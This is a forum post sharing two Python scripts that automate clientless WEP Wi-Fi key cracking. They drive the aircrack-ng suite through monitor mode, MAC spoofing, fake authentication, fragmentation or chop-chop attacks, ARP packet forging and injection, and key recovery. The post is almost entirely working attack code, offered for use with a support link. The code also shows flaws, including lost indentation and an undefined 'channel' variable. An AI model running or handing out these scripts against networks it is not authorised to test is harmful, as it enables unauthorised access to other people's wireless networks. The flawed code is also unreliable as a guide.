• 1 Vote(s) - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Automated WEP cracking script (Clientless)
#1
This is an automated script i made in conjunction with this tutorial:

http://mcompute.co.uk/showthread.php?tid=166


The source code can be found below:

wep.py

[code=python]
#!/usr/bin/python
import os

print "\n |---------------------------------------------------------------| \n | \n | " " Mark's clientless WEP cracking script. " " Frag / Chop " " (wep.py) \n | \n | "" For questions or support please visit http://mcompute.co.uk \n | \n | " " This script utilises the aircrack-ng suite and macchanger \n | \n | " " sudo apt-get install aircrack-ng \n | " " sudo apt-get install macchanger \n | \n | " " Note: Please make sure you have a compatible WiFi card \n | \n |---------------------------------------------------------------|"
raw_input("\n Press enter to continue..")

#Stores the file location of wep2.py to write to it later.
print "\n Enter the full file location of the file 'wep2.py' (eg. /home/mark/wep2.py )"
file_location = raw_input(' '"File location: ")

print "\n\n Please determine your wirelesss interface from the list below."

#Prints all the available wireless interfaces.
airmon = "airmon-ng"
os.system(airmon)

#Stores the wireless interface in a string.
interface = raw_input("\n Enter your wireless interface: ")

#Stops the wireless interface
airmon_stop = "airmon-ng stop " + interface
os.system(airmon_stop)

#Starts the wireless interface
airmon_start = "airmon-ng start " + interface
os.system(airmon_start)

#Gets the interface, that's in monitor mode.
print "" " The one that's been put in to monitor mode."
new_interface = raw_input("" " Enter the interface you want to scan on: ")

#Stores the MAC address they want to spoof to.
print "\n Example: 00:11:22:33:44:55"
spoof_mac = raw_input("" " Enter the MAC address you want to spoof to: ")

#Put's the interface (In monitor mode) down.
new_down = "ifconfig " + new_interface + " down"

#Spoofs the MAC address of the interface (The one in monitor mode)
spoof2 = "macchanger --mac " + spoof_mac + " " + new_interface

#Put's the new interface (One monitor mode) up.
new_up = "ifconfig " + new_interface + " up"

#Runs the 3 above configs, basically changes the MAC address of the interface in monitor mode.
os.system(new_down)
os.system(spoof2)
os.system(new_up)

print "\n It will now start to scan for available wireless networks, to continue from the scanning page you will need to press ctrl + c once you have gathered the required information."
raw_input("" " Press enter to start scanning..")

#Starts scanning for wireless networks
airodump_scan = "airodump-ng " + new_interface
os.system(airodump_scan)

#Stores the channel, the designated capture file and the BSSID of the access point.
print "Please enter the following information about the wireless network that you wish to crack. (WEP encryption only!)"
bssid_ap = raw_input("BSSID of the Access point: ")
ssid = raw_input("SSID of the Access point: ")
channel_number = raw_input("Channel number: ")
cap_file_name = raw_input("Desired capture file name: ")

#Puts the new interface on the specified channel
iw_channel = "iwconfig " + new_interface + " channel " + channel_number
os.system(iw_channel)

#Fake authentication
fake_authentication = "aireplay-ng -1 0 -e " + ssid + " " + "-a " + bssid_ap + " -h " + spoof_mac + " " + new_interface
fake_auth_advanced = "aireplay-ng -1 6000 -o 1 -q 10 -e" + " " + ssid + " -a " + bssid_ap + " -h " + spoof_mac + " " + new_interface + "\n"

print "\n It will now attempt to authenticate with the wireless access point."
raw_input("" " Press enter to start the authentication.." "\n")

#Fake authenticates to the wireless access point (simple method)
os.system(fake_authentication)

# Variables for the loop
retry_yes = "r"
retry_no = "c"

auth_problem = ("\n Note: \n If you're having problems authenticating, you can try and manually authenticate by entering the following in to a new terminal before you continue: \n \n Simple: \n" + " " + fake_authentication + " \n \n Advanced: \n" + " " + fake_auth_advanced)

#Cycles the fake_auth, if it fails - you can re-try.
print "\n If the attack was unsuccessful, press 'r' to retry."
print "" " If the attack was successful, press ' c ' to continue."
print " " + auth_problem

def fake_auth():
os.system(fake_authentication)

while 1:
retry = raw_input("" " Press ' r ' to retry or ' c ' to continue.. ")
if retry == retry_yes:
fake_auth()
if retry == retry_no:
break

#Chooses the attack method that you want to perform.

print ("\n Available attack methods: ")
print ("\n Fragmentation attack")
print (" Chop chop attack")
print ("\n Enter either ' frag ' or ' chop '")

#frag
fragmentation_attack = "aireplay-ng -5 -b " + bssid_ap + " -h " + spoof_mac + " " + new_interface

#chop
chopchop_attack = "aireplay-ng -4 -h " + spoof_mac + " -b " + bssid_ap + " " + new_interface

#Variables for attack choice loop
frag = "frag"
chopchop = "chop"
continu = "c"

print "\n Note:"
print "" " If the attack is unsuccessful, you can enter the desired attack again to retry. (ctrl + c to break from the attack screen)"
print "" " If the attack is successful, after you've performed the attack press ' c ' to continue. \n"

def frag_attack():
os.system(fragmentation_attack)

def chop_attack():
os.system(chopchop_attack)


while 1:
choice = raw_input(" What attack do you want to perform? ")
if choice == frag:
frag_attack()
if choice == chopchop:
chop_attack()
if choice == continu:
break

#Gets the xorfile name
print "\n Exclude the extension '.xor'"
xorfile = raw_input(" Enter the name of the xor file: ")

#The file name that the RPGA key is stored in.
file_out = raw_input(" Desired name of the RPGA file: ")

#Stores the RPGA key in a file.
packetforge = "packetforge-ng -0 -a " + bssid_ap + " -h " + spoof_mac + " -k 255.255.255.255 -l 255.255.255.255 -y " + xorfile + ".xor -w " + file_out
os.system(packetforge)

print "\n After you've pressed enter, please leave this terminal open and run the file ' wep2.py ' in a new terminal."
raw_input("\n Press enter to continue..")

#Opens and reads the file wep2.py
file = open(file_location, 'r')
info=file.readlines()
info[3]= "file_out = " + "'" + file_out + "'" + "\n"
info[4]= "new_interface = " + "'" + new_interface + "'" + "\n"
info[5]= "cap_file_name = " + "'" + cap_file_name + "'" + "\n"
info[6]= "bssid_ap = " + "'" + bssid_ap + "'" + "\n"
info[7]= "ssid = " + "'" + ssid + "'" + "\n"
info[8]= "spoof_mac = " + "'" + spoof_mac + "'" + "\n"

#Opens and writes to the file wep2.py
file = open(file_location, 'w')
file.writelines(info)
#Closes the file
file.close()

#Desired file name of the .cap file
airodump = "airodump-ng -c " + channel + " --bssid " + bssid_ap + " -w " + cap_file_name + " " + new_interface
os.system(airodump)
[/code]


wep2.py

[code=python]
#!/usr/bin/python
import os

file_out = 'rpga'
new_interface = 'mon0'
cap_file_name = 'cap-file'
bssid_ap = '00:E0:98:51:1A:C4'
ssid = 'mcompute.co.uk'
spoof_mac = '00:11:22:33:44:55'

fake_authentication = "Simple: \n aireplay-ng -1 0 -e " + ssid + " " + "-a " + bssid_ap + " -h " + spoof_mac + " " + new_interface
fake_auth_advanced = "Advanced: \n aireplay-ng -1 6000 -o 1 -q 10 -e" + " " + ssid + " -a " + bssid_ap + " -h " + spoof_mac + " " + new_interface + "\n"

print "\n |---------------------------------------------------------------| \n | \n | " " Mark's WEP cracking script. " " (wep2.py) \n | \n | " " For questions or support please visit http://mcompute.co.uk \n | \n | " " Note: Please run the file ' wep.py ' first \n | \n |---------------------------------------------------------------|"
raw_input("\n Press enter to continue..")

print "\n It will now attempt to inject arp packets."
print "" " If the data isn't rising, make sure you're still authenticated with the access point. \n"

print fake_authentication
print fake_auth_advanced

print "" " Once you've collected enough data, press ctrl + c to break from packet injection and to crack the password. \n"

#Interactive frame selection
aireplay_2 = "aireplay-ng -2 -r " + file_out + " " + new_interface
os.system(aireplay_2)

print "\n \n Thank you for using Mark's WEP cracking script. If you have any questions, problems or feedback please go to http://mcompute.co.uk"
raw_input("\n Press enter to crack the password..")

#Cracks the password
aircrack_ng = "aircrack-ng -b " + bssid_ap + " " + cap_file_name + "*.cap"
os.system(aircrack_ng)
[/code]


If there's any problems, post or PM me. Smile
  Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Automated WEP cracking script (Client) Mark 0 10,986 30-06-2010, 10:42 PM
Last Post: Mark

Forum Jump: